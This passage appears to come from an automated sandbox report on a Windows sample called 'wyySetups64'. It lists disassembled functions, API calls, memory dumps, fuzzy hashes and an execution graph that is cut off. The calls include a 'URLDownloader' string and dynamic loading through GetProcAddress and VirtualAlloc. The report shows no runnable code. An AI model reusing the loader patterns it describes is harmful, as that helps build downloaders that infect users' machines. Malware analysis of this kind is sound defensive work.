                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                                                                                                                                              • String ID: URLDownloader
                                                                                                                                                                                                              • API String ID: 1466638765-1891997712
                                                                                                                                                                                                              • Opcode ID: 135d216f9536d5fef4871bc611d23d6ad4692f8f9cf4bb8f7097ed8d31648b84
                                                                                                                                                                                                              • Instruction ID: 3181bbcb2b9caa1ef0c1f22c926e586b91b1f05f2254f4f57ba8959088f3d27b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 135d216f9536d5fef4871bc611d23d6ad4692f8f9cf4bb8f7097ed8d31648b84
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0F0C975900224DFE71ADF58DC88A9577B8FB0D350B018069F909C7322CB34E911CB54
                                                                                                                                                                                                              Function 00D5F057 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00D5FF47: NdrClientCall2.RPCRT4 ref: 00D5FF66
                                                                                                                                                                                                              • CoTaskMemFree.COMBASE(00000000), ref: 00D5F16C
                                                                                                                                                                                                              • CoTaskMemFree.COMBASE(00000000), ref: 00D5F179
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeTask$Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3085621743-0
                                                                                                                                                                                                              • Opcode ID: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                                                              • Instruction ID: 62ff2036f992ce70951ed36b491d7045272063765e137392022de616539b72b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB510C74D00609DBCF04CF94C984AEEB7B1FF48305F248559ED15AB384D735AA89CBA4
                                                                                                                                                                                                              Function 00D53FF7 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00D5400E
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 00D54068
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00D54080
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 00D540CC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                                                                                              • Opcode ID: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
                                                                                                                                                                                                              • Instruction ID: f85d1b46330a92312850b2d81c1e69c5def5b655719cfb05bfa8aece77c397e1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE3134B5E40204BFEB14DFD8CC86FAEB7B5EB48710F244254F615AB2C1D671AA10CB65
                                                                                                                                                                                                              Function 1000D330 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10011CF6,000000FF,?,1000CB92,?), ref: 1000D350
                                                                                                                                                                                                              • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10011CF6,000000FF,?,1000CB92), ref: 1000D36B
                                                                                                                                                                                                              • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,1000CB92,?), ref: 1000D39F
                                                                                                                                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 1000D417
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1566052064-0
                                                                                                                                                                                                              • Opcode ID: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
                                                                                                                                                                                                              • Instruction ID: 4d9198b2984e5e082309ff7aa8a3130d82e8df6aeec633f907ab193b7f9989e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79313EB4D00259DFDB04DFA4C895BEEBBB4FF48350F208619E915A3395DB34AA40CBA1
                                                                                                                                                                                                              Function 10010BB0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 10010BFD
                                                                                                                                                                                                                • Part of subcall function 100114A3: InitializeSListHead.KERNEL32(10017318,10010C07,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 100114A8
                                                                                                                                                                                                              • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012320,10012324,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C16
                                                                                                                                                                                                              • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012300,1001231C,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C34
                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10010C67
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590286634-0
                                                                                                                                                                                                              • Opcode ID: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
                                                                                                                                                                                                              • Instruction ID: 39f7e9c7f58ab3c24a5f1c768587727ae30ebfb406468ad2b612d2fa9f71a151
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D421027A7482129AEB18EBB898027CC37A1EF11364F108205F4C96F1C3DBF1E5C18A96
                                                                                                                                                                                                              Function 1000B2A0 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2AD
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2BA
                                                                                                                                                                                                              • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2C5
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2D2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2950233615-0
                                                                                                                                                                                                              • Opcode ID: 1783d4faa295622926a9acba5ea9b70e108ed3dee63503e54d904724665c109e
                                                                                                                                                                                                              • Instruction ID: 286a1d44accefb07714ea732755267c184901f6fbadf7b8dc8f0254af49e132d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1783d4faa295622926a9acba5ea9b70e108ed3dee63503e54d904724665c109e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5110D74E00219EFDB14DFA4D9958AEB7F5FF48240B204199E805A7355EB30AF01EB90
                                                                                                                                                                                                              Function 1000C0C0 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,1000B486), ref: 1000C0CA
                                                                                                                                                                                                              • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0DD
                                                                                                                                                                                                              • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0EC
                                                                                                                                                                                                              • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(1000B44A,1000B44A,1000B449,?,1000B486), ref: 1000C110
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3089488326-0
                                                                                                                                                                                                              • Opcode ID: 9fea32db6d82a8732664cb0fa318f11d1207675337fcaee34ad8ebc0f3171566
                                                                                                                                                                                                              • Instruction ID: e6559f61c40ac0d619c819a68eafb266e25295ce9371c656e40cb26db6e47210
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fea32db6d82a8732664cb0fa318f11d1207675337fcaee34ad8ebc0f3171566
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F0FF70900108EFCB08DF98CE9599DB7B6FF48301B20819EE406A3352CB31AF50EB54
                                                                                                                                                                                                              Function 00D605E7 Relevance: 6.0, APIs: 4, Instructions: 28threadsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00D605F4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000), ref: 00D605FB
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 00D60610
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 00D60625
                                                                                                                                                                                                                • Part of subcall function 00D51147: LoadLibraryW.KERNEL32(10012398), ref: 00D51152
                                                                                                                                                                                                                • Part of subcall function 00D51147: GetProcAddress.KERNEL32(?,100123AC), ref: 00D51164
                                                                                                                                                                                                                • Part of subcall function 00D51147: GetProcAddress.KERNEL32(?,100123C0), ref: 00D51178
                                                                                                                                                                                                                • Part of subcall function 00D51147: GetModuleHandleA.KERNEL32(00000000), ref: 00D511D4
                                                                                                                                                                                                                • Part of subcall function 00D51147: RegisterClassW.USER32(?), ref: 00D511E8
                                                                                                                                                                                                                • Part of subcall function 00D51147: CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D5120D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 487361192-0
                                                                                                                                                                                                              • Opcode ID: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                                                              • Instruction ID: 497580ef38e86cf103f96492f3025fedcb5ba00a2cb07c029fb5e94085fd2c30
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13E0FEB5384354BAF661B7E05C4BF5936549B09F42F608650F749B90E2CAF4A410863D
                                                                                                                                                                                                              Function 00D613C0 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 00D613D2
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00D613E1
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00D613EA
                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00D613F7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                              • Opcode ID: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                                                              • Instruction ID: 0a3c688fa97bd66b33bde44f19f6c44622bf0dc03c57f15caf060906c92fb81b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45F062B4D1021DEBDB05DBB4CA8999EBBF4FF1D200B918696E412E7111E730EB64DB50
                                                                                                                                                                                                              Function 100046A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100046D3
                                                                                                                                                                                                              • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 100047D2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                              • API String ID: 2188046178-4119554291
                                                                                                                                                                                                              • Opcode ID: 7c1adb2ab773884ace89058cb2ac793d15e5cf7632ab6271f58e31800855c332
                                                                                                                                                                                                              • Instruction ID: e9e11cb9fd6853f183fefa1d41d0e0024c16e6e010e8b744e496187a2de98be2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c1adb2ab773884ace89058cb2ac793d15e5cf7632ab6271f58e31800855c332
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE51467480424CEFEB14CBA4CC91BEEBBB5EF54340F148199E11977296DB302A49CBA2
                                                                                                                                                                                                              Function 10010771 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(100172D4,?,URLDownloader,?,1000177C,100176B8,?,?,?,?,100019DB,10017674,00C40000,80000000,80000000,00000190), ref: 1001077C
                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(100172D4,?,1000177C,100176B8,?,?,?,?,100019DB,10017674,00C40000,80000000,80000000,00000190,00000078,00000000), ref: 100107B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                              • String ID: URLDownloader
                                                                                                                                                                                                              • API String ID: 17069307-1891997712
                                                                                                                                                                                                              • Opcode ID: 9f1511a7a3ffbcca7e38548f47a2cc02b1a111f10bc6b3d82736ec6af61c00fc
                                                                                                                                                                                                              • Instruction ID: 8654295f68b371237154e9a797b482e4a7d7525e36026ba3eb3070c176022b3d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f1511a7a3ffbcca7e38548f47a2cc02b1a111f10bc6b3d82736ec6af61c00fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87F0A734A04211DBD321DF14C844A65B7B4FB49770F10432EF9A98B2E1D774E8C2CE51

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:5.3%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                              Signature Coverage:3.2%
                                                                                                                                                                                                              Total number of Nodes:629
                                                                                                                                                                                                              Total number of Limit Nodes:20
                                                                                                                                                                                                              execution_graph 43298 b20032 43309 b20ae4 GetPEB 43298->43309 43301 b20ae4 GetPEB 43304 b202a7 43301->43304 43302 b204a6 GetNativeSystemInfo 43303 b204d3 VirtualAlloc 43302->43303 43307 b20a02 43302->43307 43305 b204ec VirtualAlloc 43303->43305 43306 b204ff 43303->43306 43304->43302 43304->43307 43305->43306 43306->43306 43311 bd7813 43306->43311 43310 b2029b 43309->43310 43310->43301 43312 bd781e 43311->43312 43313 bd7823 43311->43313 43325 bdb54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 43312->43325 43317 bd771d 43313->43317 43316 bd7831 43316->43307 43318 bd7729 __lseeki64 43317->43318 43322 bd7776 43318->43322 43323 bd77c6 __lseeki64 43318->43323 43326 bd75b9 43318->43326 43320 bd77a6 43321 bd75b9 __CRT_INIT@12 149 API calls 43320->43321 43320->43323 43321->43323 43322->43320 43322->43323 43324 bd75b9 __CRT_INIT@12 149 API calls 43322->43324 43323->43316 43324->43320 43325->43313 43327 bd75c5 __lseeki64 43326->43327 43328 bd75cd 43327->43328 43329 bd7647 43327->43329 43378 bd803b HeapCreate 43328->43378 43331 bd764d 43329->43331 43332 bd76a8 43329->43332 43338 bd766b 43331->43338 43345 bd75d6 __lseeki64 43331->43345 43388 bd8306 66 API calls _doexit 43331->43388 43333 bd76ad 43332->43333 43334 bd7706 43332->43334 43393 bd9754 TlsGetValue 43333->43393 43334->43345 43416 bd9a58 79 API calls __freefls@4 43334->43416 43335 bd75d2 43337 bd75dd 43335->43337 43335->43345 43379 bd9ac6 86 API calls 4 library calls 43337->43379 43343 bd767f 43338->43343 43389 bdb0e4 67 API calls _free 43338->43389 43392 bd7692 70 API calls __mtterm 43343->43392 43345->43322 43347 bd75e2 __RTC_Initialize 43350 bd75e6 43347->43350 43356 bd75f2 GetCommandLineA 43347->43356 43380 bd8059 HeapDestroy 43350->43380 43351 bd7675 43390 bd97a5 70 API calls _free 43351->43390 43352 bd76ca DecodePointer 43360 bd76df 43352->43360 43355 bd767a 43391 bd8059 HeapDestroy 43355->43391 43381 bdb468 71 API calls 2 library calls 43356->43381 43357 bd75eb 43357->43345 43362 bd76fa 43360->43362 43363 bd76e3 43360->43363 43361 bd7602 43382 bdae9f 73 API calls __calloc_crt 43361->43382 43415 bd6e49 66 API calls _free 43362->43415 43402 bd97e2 43363->43402 43367 bd76ea GetCurrentThreadId 43367->43345 43368 bd760c 43369 bd7610 43368->43369 43384 bdb3ad 95 API calls 3 library calls 43368->43384 43383 bd97a5 70 API calls _free 43369->43383 43372 bd761c 43373 bd7630 43372->43373 43385 bdb137 94 API calls 6 library calls 43372->43385 43373->43357 43387 bdb0e4 67 API calls _free 43373->43387 43376 bd7625 43376->43373 43386 bd8119 77 API calls 4 library calls 43376->43386 43378->43335 43379->43347 43380->43357 43381->43361 43382->43368 43383->43350 43384->43372 43385->43376 43386->43373 43387->43369 43388->43338 43389->43351 43390->43355 43391->43343 43392->43345 43394 bd9769 DecodePointer TlsSetValue 43393->43394 43395 bd76b2 43393->43395 43394->43395 43396 bd9fe4 43395->43396 43398 bd9fed 43396->43398 43399 bd76be 43398->43399 43400 bda00b Sleep 43398->43400 43417 bde555 43398->43417 43399->43345 43399->43352 43401 bda020 43400->43401 43401->43398 43401->43399 43428 bd9db0 43402->43428 43404 bd97ee GetModuleHandleW 43429 bdc144 43404->43429 43406 bd982c InterlockedIncrement 43436 bd9884 43406->43436 43409 bdc144 __lock 64 API calls 43410 bd984d 43409->43410 43439 bdde7f InterlockedIncrement 43410->43439 43412 bd986b 43451 bd988d 43412->43451 43414 bd9878 __lseeki64 43414->43367 43415->43345 43416->43345 43418 bde561 43417->43418 43420 bde57c 43417->43420 43419 bde56d 43418->43419 43418->43420 43426 bd710d 66 API calls __getptd_noexit 43419->43426 43422 bde58f HeapAlloc 43420->43422 43424 bde5b6 43420->43424 43427 bd8550 DecodePointer 43420->43427 43422->43420 43422->43424 43423 bde572 43423->43398 43424->43398 43426->43423 43427->43420 43428->43404 43430 bdc16c EnterCriticalSection 43429->43430 43431 bdc159 43429->43431 43430->43406 43454 bdc082 66 API calls 8 library calls 43431->43454 43433 bdc15f 43433->43430 43455 bd8315 66 API calls 3 library calls 43433->43455 43456 bdc06b LeaveCriticalSection 43436->43456 43438 bd9846 43438->43409 43440 bdde9d InterlockedIncrement 43439->43440 43441 bddea0 43439->43441 43440->43441 43442 bddead 43441->43442 43443 bddeaa InterlockedIncrement 43441->43443 43444 bddeba 43442->43444 43445 bddeb7 InterlockedIncrement 43442->43445 43443->43442 43446 bddec4 InterlockedIncrement 43444->43446 43447 bddec7 43444->43447 43445->43444 43446->43447 43448 bddee0 InterlockedIncrement 43447->43448 43449 bddef0 InterlockedIncrement 43447->43449 43450 bddefb InterlockedIncrement 43447->43450 43448->43447 43449->43447 43450->43412 43457 bdc06b LeaveCriticalSection 43451->43457 43453 bd9894 43453->43414 43454->43433 43456->43438 43457->43453 43458 bef0df 43465 bd2c60 WSAStartup CreateEventW InterlockedExchange 43458->43465 43460 bef0e4 43462 bef7db 43460->43462 43468 bd6f17 43460->43468 43480 bd5a20 CreateEventW 43462->43480 43508 bd6815 43465->43508 43467 bd2cff 43467->43460 43471 bd6f21 43468->43471 43470 bd6f3b 43470->43460 43471->43470 43473 bd6f3d std::exception::exception 43471->43473 43517 bd6e83 43471->43517 43534 bd8550 DecodePointer 43471->43534 43478 bd6f7b 43473->43478 43535 bd73e9 76 API calls __cinit 43473->43535 43475 bd6f85 43537 bd7836 RaiseException 43475->43537 43536 bd6e24 66 API calls std::exception::operator= 43478->43536 43479 bd6f96 43481 bd5a79 43480->43481 43482 bd5a83 43480->43482 43552 bd1280 DeleteCriticalSection RaiseException __CxxThrowException@8 43481->43552 43546 bd6410 HeapCreate 43482->43546 43486 bd5b1c CreateEventW 43488 bd5b5f CreateEventW 43486->43488 43489 bd5b55 43486->43489 43487 bd5b12 43553 